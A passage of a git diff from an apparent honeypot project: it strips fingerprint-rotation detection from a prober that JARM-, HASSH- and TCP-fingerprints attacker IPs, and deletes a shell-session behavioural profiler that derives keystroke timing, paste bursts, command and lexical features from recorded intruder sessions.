from scapy.all import IP, TCP # type: ignore[attr-defined]
from scapy.all import IP, TCP
ip_layer = resp[IP]
tcp_layer = resp[TCP]

View File

@@ -27,9 +27,6 @@ from datetime import datetime, timezone
from pathlib import Path
from typing import Any, Callable
from sqlalchemy.engine import Engine
from sqlmodel import Session
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
@@ -38,10 +35,6 @@ from decnet.bus.publish import (
run_control_listener,
run_health_heartbeat,
)
from decnet.correlation.fingerprint_rotation import (
ProbeType,
record_fingerprint,
)
from decnet.logging import get_logger
from decnet.prober.hassh import hassh_server
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -51,21 +44,6 @@ from decnet.telemetry import traced as _traced
logger = get_logger("prober")
def _build_sync_engine() -> Engine:
    """Create the synchronous SQLite engine used for rotation-detection state.

    The database path comes from the ``DECNET_DB_PATH`` environment
    variable and falls back to ``decnet.db`` under the project root
    (``decnet.config._ROOT``). The engine itself is built by
    ``get_sync_engine``.
    """
    import os
    from decnet.config import _ROOT
    from decnet.web.db.sqlite.database import get_sync_engine

    fallback_path = str(_ROOT / "decnet.db")
    return get_sync_engine(os.environ.get("DECNET_DB_PATH", fallback_path))
# ─── Default ports per probe type ───────────────────────────────────────────
# JARM: common C2 callback / TLS server ports
@@ -255,14 +233,6 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
ProbePublishFn = Callable[[str, dict[str, Any]], None]
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
# performs the rotation-detection upsert + derived-event emission for the
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
# behaves exactly as before (raw fingerprint emit only, no rotation
# detection). Construction lives at worker startup so phase functions
# don't have to know about the DB engine.
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
@_traced("prober.probe_cycle")
def _probe_cycle(
@@ -275,7 +245,6 @@ def _probe_cycle(
json_path: Path,
timeout: float = 5.0,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -294,13 +263,13 @@ def _probe_cycle(
ip_probed = probed.setdefault(ip, {})
# Phase 1: JARM (TLS fingerprinting)
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
# Phase 2: HASSHServer (SSH fingerprinting)
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
# Phase 3: TCP/IP stack fingerprinting
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
@_traced("prober.jarm_phase")
@@ -312,7 +281,6 @@ def _jarm_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""JARM-fingerprint an IP on the given TLS ports."""
done = ip_probed.setdefault("jarm", set())
@@ -333,8 +301,6 @@ def _jarm_phase(
msg=f"JARM {ip}:{port} = {h}",
)
logger.info("prober: JARM %s:%d = %s", ip, port, h)
if record_rotation is not None:
record_rotation(ip, port, "jarm", h)
if publish_fn is not None:
publish_fn(
"jarm",
@@ -421,7 +387,6 @@ def _hassh_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""HASSHServer-fingerprint an IP on the given SSH ports."""
done = ip_probed.setdefault("hassh", set())
@@ -447,8 +412,6 @@ def _hassh_phase(
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
)
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
if record_rotation is not None:
record_rotation(ip, port, "hassh", result["hassh_server"])
if publish_fn is not None:
publish_fn(
"hassh",
@@ -482,7 +445,6 @@ def _tcpfp_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""TCP/IP stack fingerprint an IP on the given ports."""
done = ip_probed.setdefault("tcpfp", set())
@@ -516,8 +478,6 @@ def _tcpfp_phase(
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
)
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
if record_rotation is not None:
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
if publish_fn is not None:
publish_fn(
"tcpfp",
@@ -626,61 +586,6 @@ async def prober_worker(
event_type,
)
# Substrate-rotation detection (DEBT-032) — open a sync engine for
# the prober's lifetime; recorder closes a session per call so we
# never hold a connection across phase boundaries. Failure to
# connect is non-fatal: probes continue, rotation detection is
# silently disabled.
rotation_engine: Engine | None = None
record_rotation: RotationRecorderFn | None = None
try:
rotation_engine = _build_sync_engine()
except Exception as exc: # noqa: BLE001
logger.warning(
"prober: rotation-detection DB unavailable, "
"running with rotation detection disabled: %s", exc,
)
if rotation_engine is not None:
    def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
        """Publish a rotation payload on the fingerprint-rotated attacker topic."""
        raw_publish(
            _topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
            payload,
            event_type,
        )

    def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
        """Write a ``fingerprint_rotated`` record via ``_write_event``.

        ``event_type`` is accepted to match the callback signature but is
        not used; the record name is fixed.
        """
        _write_event(
            log_path, json_path,
            "fingerprint_rotated",
            target_ip=payload["attacker_ip"],
            target_port=str(payload["port"]),
            probe_type=payload["probe_type"],
            old_hash=payload.get("old_hash") or "",
            new_hash=payload["new_hash"],
            rotation_count=str(payload["rotation_count"]),
            # The old and new hashes used to be concatenated with nothing
            # between them, which made the message unreadable; keep an
            # explicit separator so the two values can be told apart.
            msg=(
                f"FP rotation {payload['attacker_ip']}:{payload['port']} "
                f"{payload['probe_type']} {payload.get('old_hash')} -> "
                f"{payload['new_hash']}"
            ),
        )

    def record_rotation(
        ip: str, port: int, probe_type: ProbeType, new_hash: str,
    ) -> None:
        """Record one observed fingerprint through ``record_fingerprint``.

        A fresh ``Session`` is opened and closed per call, so no
        connection is held between probe phases.
        """
        with Session(rotation_engine) as session:
            record_fingerprint(
                session,
                attacker_ip=ip,
                port=port,
                probe_type=probe_type,
                new_hash=new_hash,
                ts=datetime.now(timezone.utc),
                publish_fn=_publish_rotation,
                syslog_fn=_syslog_rotation,
            )
shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
control_task = asyncio.create_task(
@@ -707,7 +612,6 @@ async def prober_worker(
jarm_ports, hassh_ports, tcp_ports,
log_path, json_path, timeout,
_publish_attacker,
record_rotation,
)
try:
@@ -722,6 +626,3 @@ async def prober_worker(
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
if rotation_engine is not None:
with contextlib.suppress(Exception):
rotation_engine.dispose()

View File

@@ -1,25 +0,0 @@
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
emission, and persistence. The engine just turns one PTY session into
``Iterable[Observation]``.
BEHAVE is the spec; DECNET is the engine.
"""
from __future__ import annotations
from decnet.profiler.behave_shell.extract import (
DEFAULT_SOURCE,
build_context,
extract_session,
)
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
# emit; calibration grid honest). The ``-pre`` suffix stays until
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
# table writes + AttackerDetail panel; only then does H.5 proper drop the
# suffix and tag v0.
__version__ = "0.1.0-pre"
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]

View File

@@ -1,573 +0,0 @@
"""SessionContext: precomputed bundle every feature function reads from.
A naïve engine re-walks the event stream once per primitive. We don't
do that — one walk over the events builds this context, every feature
reads from it. Adding a new feature is O(1) cost on the parse side.
Step 1 fills ``iats`` (inter-key intervals between input events) and
``paste_bursts`` (contiguous runs of paste-class events). Step 4
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
"""
from __future__ import annotations
import math
from dataclasses import dataclass, field
from typing import Iterable, Mapping
from decnet.profiler.behave_shell._intent import (
LEXEME_MAX_LEN,
NEGATIVE_LEXEMES,
OBSCENITY_LEXEMES,
POSITIVE_LEXEMES,
)
from decnet.profiler.behave_shell._parse import (
AsciinemaEvent,
Command,
PasteBurst,
PromptLine,
detect_error_in_output,
extract_prompt_lines,
hash_token,
strip_ansi,
)
from decnet.profiler.behave_shell._thresholds import (
IKI_THINK_MAX_S,
LAYOUT_BIGRAM_TOP_N,
PASTE_BURST_MAX_IAT_S,
PASTE_MIN_CHARS_PER_EVENT,
PROMPT_LINE_MAX_CHARS,
SHORTCUT_CTRL_BYTES,
)
@dataclass(frozen=True, slots=True)
class _LexCounters:
"""Lexical counters from the typed-text walk (G.0).
Internal to the ctx-builder; flattened onto SessionContext fields
in :func:`build_session_context`.
"""
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
@dataclass(frozen=True, slots=True)
class SessionContext:
sid: str
source: str
evidence_ref: str
t_start: float
t_end: float
duration_s: float
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
# Step 1 derivations
iats: tuple[float, ...] = field(default_factory=tuple)
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
paste_event_count: int = 0
# Step 4 derivations — command segmentation
commands: tuple[Command, ...] = field(default_factory=tuple)
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step B.3 derivations — error-correction signals
backspace_count: int = 0
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
kill_line_count: int = 0
# Step B.4 derivations — per-command intra-typing IATs
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step F.0 derivations — PS1 prompt lines detected in the output stream
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
# Step F.4 derivations — typed-only character histograms for keyboard
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_letter_count: int = 0
# Step G.0 derivations — lexical counters from the same single-pass
# typed-text walk. No raw text retained; only fixed-vocabulary
# membership counts and run-lengths. Drives valence (G.5), arousal
# (G.6), and frustration_venting (G.8).
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
def _detect_paste_bursts(
    inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
    """Collapse runs of paste-class input events into ``PasteBurst`` records.

    An event is paste-class when its payload holds at least
    ``PASTE_MIN_CHARS_PER_EVENT`` characters.  A paste-class event joins
    the open burst unless more than ``PASTE_BURST_MAX_IAT_S`` elapsed
    since the previous input event, in which case the open burst is
    sealed and a new one starts.  Any non-paste event seals the open
    burst.

    Returns ``(bursts, paste_event_count)`` where the count is the total
    number of paste-class events (what the ``BEHAVE`` prototype calls
    ``paste_events``).
    """
    sealed: list[PasteBurst] = []
    paste_events = 0
    # Open burst as [start_ts, end_ts, char_count, event_count]; None when idle.
    open_burst: list | None = None
    prev_ts: float | None = None

    def _seal() -> None:
        nonlocal open_burst
        if open_burst is not None:
            sealed.append(PasteBurst(
                start_ts=open_burst[0],
                end_ts=open_burst[1],
                char_count=open_burst[2],
                event_count=open_burst[3],
            ))
        open_burst = None

    for ts, _kind, payload in inputs:
        size = len(payload)
        if size < PASTE_MIN_CHARS_PER_EVENT:
            _seal()
        else:
            paste_events += 1
            if open_burst is None or (
                prev_ts is not None and (ts - prev_ts) > PASTE_BURST_MAX_IAT_S
            ):
                _seal()
                open_burst = [ts, ts, 0, 0]
            open_burst[1] = ts
            open_burst[2] += size
            open_burst[3] += 1
        prev_ts = ts

    _seal()
    return tuple(sealed), paste_events
_BACKSPACE_CHARS = ("\x7f", "\x08")
_KILL_LINE_CHARS = ("\x15", "\x17")
def _scan_correction_signals(
inputs: list[AsciinemaEvent],
) -> tuple[int, tuple[float, ...], int]:
"""Walk input events char-by-char, count backspaces / kill-lines /
timing IATs.
PII discipline: only counts and IATs leave this function — no
character data is retained or returned.
"""
backspace_count = 0
kill_line_count = 0
iats: list[float] = []
last_non_bs_t: float | None = None
for t, _kind, data in inputs:
for c in data:
if c in _BACKSPACE_CHARS:
backspace_count += 1
if last_non_bs_t is not None:
iats.append(max(0.0, t - last_non_bs_t))
elif c in _KILL_LINE_CHARS:
kill_line_count += 1
last_non_bs_t = t
else:
last_non_bs_t = t
return backspace_count, tuple(iats), kill_line_count
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
    """Cut a flat IAT sequence into bursts at think-pauses.

    Any IAT greater than ``IKI_THINK_MAX_S`` ends the current burst and
    is itself discarded.  Bursts holding fewer than 3 IATs are dropped —
    too short to compute a stable CV.  Mirrors the BEHAVE prototype's
    ``_split_into_bursts``.
    """
    kept: list[tuple[float, ...]] = []
    run: list[float] = []

    def _commit() -> None:
        if len(run) >= 3:
            kept.append(tuple(run))
        run.clear()

    for gap in iats:
        if gap > IKI_THINK_MAX_S:
            _commit()
        else:
            run.append(gap)
    _commit()
    return tuple(kept)
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
    """Split the input stream into commands at every ``\\r`` / ``\\n``.

    For each command only the hash of its first whitespace-delimited
    token is kept, together with three integer counters used by the
    Phase C ``motor.shell_mastery.*`` primitives:

    * ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
    * ``shortcut_count`` — readline control bytes from
      :data:`SHORTCUT_CTRL_BYTES`
    * ``pipe_count`` — ``|`` characters in the command (counted on every
      character; pasted pipelines still indicate pipeline fluency the
      operator chose to execute)

    The character buffer is discarded at each command boundary.  A
    terminator arriving with an empty buffer yields nothing, and a
    trailing buffer with no final terminator yields no command.
    """
    finished: list[Command] = []
    pending: list[str] = []
    opened_at: float | None = None
    tabs = 0
    shortcuts = 0
    pipes = 0

    for ts, _kind, payload in inputs:
        for ch in payload:
            if ch not in ("\r", "\n"):
                if not pending:
                    opened_at = ts
                pending.append(ch)
                if ch == "\t":
                    tabs += 1
                elif ch == "|":
                    pipes += 1
                elif ch in SHORTCUT_CTRL_BYTES:
                    shortcuts += 1
                continue

            # Terminator: emit only when something was typed before it.
            if not pending:
                continue
            line = "".join(pending).strip()
            head = line.split(maxsplit=1)[0] if line else ""
            finished.append(Command(
                start_ts=ts if opened_at is None else opened_at,
                end_ts=ts,
                first_token_hash=hash_token(head),
                tab_count=tabs,
                shortcut_count=shortcuts,
                pipe_count=pipes,
            ))
            pending = []
            opened_at = None
            tabs = 0
            shortcuts = 0
            pipes = 0

    return tuple(finished)
def _annotate_commands_with_output(
    commands: tuple[Command, ...],
    outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
    """Rebuild ``commands`` with their output-derived fields populated.

    Returns ``(commands, prompt_lines)``.  Every rebuilt ``Command``
    carries ``errored``, ``output_bytes`` and ``followed_by_prompt``
    (Step F.0).  ``prompt_lines`` is the concatenation, in command
    order, of the ``PromptLine`` instances found in each command's
    output window, ready to be stored on ``SessionContext.prompt_lines``.

    The output window of command *i* runs from its ``end_ts`` (the
    ``\\r``/``\\n`` that ran it) up to the ``start_ts`` of command
    *i + 1*.  The final command's window ends at ``math.inf`` so output
    arriving at or after ``t_end`` is still attributed to it.
    """
    if not commands:
        return commands, ()

    # Window end per command: the next command's start, inf for the last.
    window_ends = [following.start_ts for following in commands[1:]]
    window_ends.append(math.inf)

    rebuilt: list[Command] = []
    prompts_seen: list[PromptLine] = []
    for cmd, window_end in zip(commands, window_ends):
        n_bytes, had_error, found = _output_window(outputs, cmd.end_ts, window_end)
        prompts_seen.extend(found)
        rebuilt.append(Command(
            start_ts=cmd.start_ts,
            end_ts=cmd.end_ts,
            first_token_hash=cmd.first_token_hash,
            tab_count=cmd.tab_count,
            shortcut_count=cmd.shortcut_count,
            pipe_count=cmd.pipe_count,
            errored=had_error,
            output_bytes=n_bytes,
            followed_by_prompt=bool(found),
        ))
    return tuple(rebuilt), tuple(prompts_seen)
def _per_command_iats(
commands: tuple[Command, ...],
inputs: list[AsciinemaEvent],
) -> tuple[tuple[float, ...], ...]:
"""Per-command IATs between consecutive input events whose
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
the ``\\r``/``\\n`` itself). Returns one tuple per command.
"""
out: list[tuple[float, ...]] = []
for cmd in commands:
prev_t: float | None = None
cmd_iats: list[float] = []
for t, _kind, _data in inputs:
if t < cmd.start_ts or t >= cmd.end_ts:
continue
if prev_t is not None:
cmd_iats.append(max(0.0, t - prev_t))
prev_t = t
out.append(tuple(cmd_iats))
return tuple(out)
def _output_bytes_between(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> int:
"""Total ``len(d)`` of output events with ``start <= t < end``."""
return sum(len(d) for t, _k, d in outputs if start <= t < end)
def _typed_char_histograms(
    inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
    """Build typed-only letter histograms and the Phase G lexical counters.

    Paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``) are
    skipped — pasted text reveals nothing about the operator's keyboard
    or sentiment — and they reset every running counter.  Letters are
    case-folded ASCII; a bigram is counted only between two consecutive
    ASCII letters, so a digit or punctuation character breaks the chain.
    When more than ``LAYOUT_BIGRAM_TOP_N`` distinct bigrams were seen,
    only the most frequent ``LAYOUT_BIGRAM_TOP_N`` are returned.

    Lexical counters (G.0): a word buffer holding at most the last
    ``LEXEME_MAX_LEN`` letters is matched at every non-letter boundary
    (and once more at end of input).  Suffixes are tried longest first
    against ``OBSCENITY_LEXEMES``, ``POSITIVE_LEXEMES`` and
    ``NEGATIVE_LEXEMES`` in that order, and the first match is the only
    hit credited for that word (so ``fucking`` counts as one obscenity
    hit, not two).  Runs of upper-case characters and of ``!`` are
    tracked in the same walk.

    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
    """
    letter_counts: dict[str, int] = {}
    pair_counts: dict[str, int] = {}
    letters_seen = 0
    prev_letter: str | None = None
    tail: list[str] = []
    # Hit counters, indexed in the same order as ``lexicons``.
    lexicons = (OBSCENITY_LEXEMES, POSITIVE_LEXEMES, NEGATIVE_LEXEMES)
    hits = [0, 0, 0]
    caps_now = 0
    caps_best = 0
    bang_now = 0
    bang_best = 0

    def _settle_word() -> None:
        """Credit the longest lexeme suffix of ``tail``, then empty it."""
        word = "".join(tail)
        for size in range(min(len(word), LEXEME_MAX_LEN), 0, -1):
            candidate = word[-size:]
            slot = next(
                (i for i, lexicon in enumerate(lexicons) if candidate in lexicon),
                None,
            )
            if slot is not None:
                hits[slot] += 1
                break
        tail.clear()

    for _ts, _kind, payload in inputs:
        if len(payload) >= PASTE_MIN_CHARS_PER_EVENT:
            # A paste interrupts the bigram chain, the word and both runs.
            prev_letter = None
            _settle_word()
            caps_now = 0
            bang_now = 0
            continue

        for ch in payload:
            is_ascii = ch.isascii()

            caps_now = caps_now + 1 if is_ascii and ch.isupper() else 0
            if caps_now > caps_best:
                caps_best = caps_now

            bang_now = bang_now + 1 if ch == "!" else 0
            if bang_now > bang_best:
                bang_best = bang_now

            if not (is_ascii and ch.isalpha()):
                # Word boundary: break the bigram chain and score the word.
                prev_letter = None
                _settle_word()
                continue

            folded = ch.lower()
            letter_counts[folded] = letter_counts.get(folded, 0) + 1
            letters_seen += 1
            if prev_letter is not None:
                pair = prev_letter + folded
                pair_counts[pair] = pair_counts.get(pair, 0) + 1
            prev_letter = folded
            tail.append(folded)
            if len(tail) > LEXEME_MAX_LEN:
                # Only the last LEXEME_MAX_LEN letters can match a lexeme.
                tail[:] = tail[-LEXEME_MAX_LEN:]

    # A word still open at end of input is scored too.
    _settle_word()

    if len(pair_counts) > LAYOUT_BIGRAM_TOP_N:
        ranked = sorted(pair_counts.items(), key=lambda kv: -kv[1])
        pair_counts = dict(ranked[:LAYOUT_BIGRAM_TOP_N])

    return letter_counts, pair_counts, letters_seen, _LexCounters(
        obscenity_hits=hits[0],
        positive_lex_hits=hits[1],
        negative_lex_hits=hits[2],
        caps_run_max=caps_best,
        bang_run_max=bang_best,
    )
def _output_window(
    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
    """Summarise the output events whose timestamp lies in ``[start, end)``.

    Returns ``(byte_count, errored, prompt_lines)``:

    * ``byte_count`` — total payload length before any stripping;
    * ``errored`` — result of ``detect_error_in_output`` on the
      ANSI-stripped concatenation of the payloads;
    * ``prompt_lines`` — PS1 lines extracted from that same stripped
      text (Step F.0), stamped with the timestamp of the last event in
      the window.

    An empty window yields ``(0, False, ())``.

    PII trade-off (Phase F): the stripped text is discarded on return,
    but ``prompt_lines`` keeps PS1 strings (capped at
    ``PROMPT_LINE_MAX_CHARS``).  Only derived values leave the engine
    via observations; the prompt strings live on ``SessionContext`` so
    F.1 / F.3 / E.4 can read them.
    """
    in_window = [
        (ts, payload) for ts, _kind, payload in outputs if start <= ts < end
    ]
    if not in_window:
        return 0, False, ()

    raw_bytes = sum(len(payload) for _ts, payload in in_window)
    final_ts = in_window[-1][0]
    clean_text = strip_ansi("".join(payload for _ts, payload in in_window))

    had_error = detect_error_in_output(clean_text)
    found_prompts = tuple(extract_prompt_lines(
        clean_text, base_ts=final_ts, max_chars=PROMPT_LINE_MAX_CHARS,
    ))
    return raw_bytes, had_error, found_prompts
def build_session_context(
    events: Iterable[AsciinemaEvent],
    *,
    sid: str,
    source: str,
    evidence_ref: str | None = None,
) -> SessionContext:
    """Build the :class:`SessionContext` for ``events``.

    ``events`` is consumed once to partition it into input (``"i"``) and
    output (``"o"``) events and to find the session's time span; events
    of any other kind only contribute to the time span.  Each derivation
    helper then runs over the partitioned lists.

    ``t_start`` is the timestamp of the first event and ``t_end`` the
    largest timestamp seen; both are ``0.0`` for an empty stream.  When
    ``evidence_ref`` is missing or empty it defaults to
    ``"session:<sid>"``.
    """
    typed: list[AsciinemaEvent] = []
    shown: list[AsciinemaEvent] = []
    first_ts: float | None = None
    latest_ts: float = 0.0

    for event in events:
        ts, kind, _payload = event
        if first_ts is None:
            first_ts = ts
        if ts > latest_ts:
            latest_ts = ts
        if kind == "i":
            typed.append(event)
        elif kind == "o":
            shown.append(event)

    t_start, t_end = (0.0, 0.0) if first_ts is None else (first_ts, latest_ts)

    iats: tuple[float, ...] = tuple(
        max(0.0, nxt[0] - cur[0]) for cur, nxt in zip(typed, typed[1:])
    )

    paste_bursts, paste_count = _detect_paste_bursts(typed)
    typing_bursts = _split_typing_bursts(iats)
    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(typed)

    commands, prompt_lines = _annotate_commands_with_output(
        _segment_commands(typed), shown,
    )
    # Both per-gap series have one entry per adjacent command pair.
    adjacent = list(zip(commands, commands[1:]))
    inter_cmd_iats = tuple(
        max(0.0, nxt.start_ts - cur.end_ts) for cur, nxt in adjacent
    )
    output_per_cmd = tuple(
        _output_bytes_between(shown, cur.end_ts, nxt.start_ts)
        for cur, nxt in adjacent
    )
    intra_command_iats = _per_command_iats(commands, typed)

    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(typed)

    return SessionContext(
        sid=sid,
        source=source,
        evidence_ref=evidence_ref or f"session:{sid}",
        t_start=t_start,
        t_end=t_end,
        duration_s=max(0.0, t_end - t_start),
        input_events=tuple(typed),
        output_events=tuple(shown),
        iats=iats,
        paste_bursts=paste_bursts,
        paste_event_count=paste_count,
        commands=commands,
        inter_cmd_iats=inter_cmd_iats,
        output_per_cmd=output_per_cmd,
        typing_bursts=typing_bursts,
        backspace_count=backspace_count,
        backspace_iats=backspace_iats,
        kill_line_count=kill_line_count,
        intra_command_iats=intra_command_iats,
        prompt_lines=prompt_lines,
        typed_unigram_counts=typed_uni,
        typed_bigram_counts=typed_bi,
        typed_letter_count=typed_letters,
        obscenity_hits=lex.obscenity_hits,
        positive_lex_hits=lex.positive_lex_hits,
        negative_lex_hits=lex.negative_lex_hits,
        caps_run_max=lex.caps_run_max,
        bang_run_max=lex.bang_run_max,
    )

View File

@@ -1,104 +0,0 @@
"""Registered feature functions.
Each entry takes a ``SessionContext`` and yields zero or more
``Observation`` instances. Adding a primitive = adding a function in a
sibling module and appending it to ``FEATURES``.
"""
from __future__ import annotations
from typing import Callable, Iterable
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features.cognitive import (
cognitive_load,
command_branch_diversity,
error_resilience_fallback_to_man,
error_resilience_frustration_typing,
error_resilience_retry_tactic,
exploration_style,
feedback_loop_engagement,
planning_depth,
tool_vocabulary,
inter_command_consistency,
inter_command_latency_class,
)
from decnet.profiler.behave_shell._features.emotional_valence import (
arousal,
frustration_venting,
stress_response,
valence,
)
from decnet.profiler.behave_shell._features.environmental import (
keyboard_layout,
locale,
numpad_usage,
shell_type,
terminal_multiplexer,
)
from decnet.profiler.behave_shell._features.operational import (
cleanup_behavior,
multi_actor_indicators,
objective,
opsec_discipline,
)
from decnet.profiler.behave_shell._features.temporal import (
escalation_pattern,
exit_behavior,
landing_ritual,
session_duration,
)
from decnet.profiler.behave_shell._features.motor import (
command_chunking,
error_correction,
input_modality,
keystroke_cadence,
motor_stability,
paste_burst_rate,
pipe_chaining_depth,
shortcut_usage,
tab_completion,
)
# Signature shared by every registered feature function: it receives the
# session's SessionContext and yields zero or more Observation records.
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
# Registry of feature functions.  Entries are grouped below by the
# sibling module they are imported from; to register a new primitive,
# append its function here.
FEATURES: tuple[FeatureFn, ...] = (
# --- _features.motor ---
input_modality,
paste_burst_rate,
keystroke_cadence,
motor_stability,
error_correction,
command_chunking,
tab_completion,
shortcut_usage,
pipe_chaining_depth,
# --- _features.cognitive ---
inter_command_latency_class,
command_branch_diversity,
feedback_loop_engagement,
inter_command_consistency,
cognitive_load,
exploration_style,
planning_depth,
tool_vocabulary,
error_resilience_retry_tactic,
error_resilience_frustration_typing,
error_resilience_fallback_to_man,
# --- _features.temporal ---
session_duration,
escalation_pattern,
landing_ritual,
exit_behavior,
# --- _features.environmental ---
shell_type,
terminal_multiplexer,
locale,
keyboard_layout,
numpad_usage,
# --- _features.operational ---
objective,
opsec_discipline,
cleanup_behavior,
multi_actor_indicators,
# --- _features.emotional_valence ---
valence,
arousal,
stress_response,
frustration_venting,
)

View File

@@ -1,32 +0,0 @@
"""Helper for building registry-valid :class:`Observation` records.
Every feature module would otherwise repeat the same Window /
source / evidence_ref boilerplate. This helper centralises it and is
the one place to reach when emission semantics change (e.g. when we
start parametrising windows on a per-primitive basis).
"""
from __future__ import annotations
from typing import Any
from behave_core.spec.envelope import Observation, Window
from decnet.profiler.behave_shell._ctx import SessionContext
def make_observation(
    ctx: SessionContext,
    *,
    primitive: str,
    value: Any,
    confidence: float,
) -> Observation:
    """Assemble an :class:`Observation` spanning the whole session.

    The window runs from ``ctx.t_start`` to ``ctx.t_end``; ``source``
    and ``evidence_ref`` are copied from ``ctx``.  ``primitive``,
    ``value`` and ``confidence`` are passed through unchanged.
    """
    whole_session = Window(start_ts=ctx.t_start, end_ts=ctx.t_end)
    return Observation(
        primitive=primitive,
        value=value,
        confidence=confidence,
        window=whole_session,
        source=ctx.source,
        evidence_ref=ctx.evidence_ref,
    )

View File

@@ -1,593 +0,0 @@
"""``cognitive.*`` feature functions.
Step 5: ``cognitive.inter_command_latency_class``.
Step 6: ``cognitive.command_branch_diversity``.
Step 7: ``cognitive.feedback_loop_engagement``.
Step 8: ``cognitive.inter_command_consistency``.
Step D.1: ``cognitive.cognitive_load``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._parse import hash_token
from decnet.profiler.behave_shell._thresholds import (
BRANCH_DIVERSITY_LINEAR_MIN,
COGNITIVE_LOAD_CHUNKING_REF_CV,
COGNITIVE_LOAD_LOW_MAX,
COGNITIVE_LOAD_MEDIUM_MAX,
COGNITIVE_LOAD_PACE_REF_CV,
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
EXPLORATION_TARGETED_REP_MIN,
FEEDBACK_CORRELATION_MIN,
FEEDBACK_MIN_PAIRS,
FRUSTRATION_LOW_MAX,
FRUSTRATION_MODERATE_MAX,
IKI_THINK_MAX_S,
INTER_CMD_DELIBERATE_MAX,
INTER_CMD_INSTANT_MAX,
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
INTER_CMD_TYPING_MAX,
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
PAUSE_CV_BIMODAL_MIN,
PAUSE_CV_METRONOMIC_MAX,
PLANNING_DEEP_MIN,
PLANNING_REACTIVE_MIN,
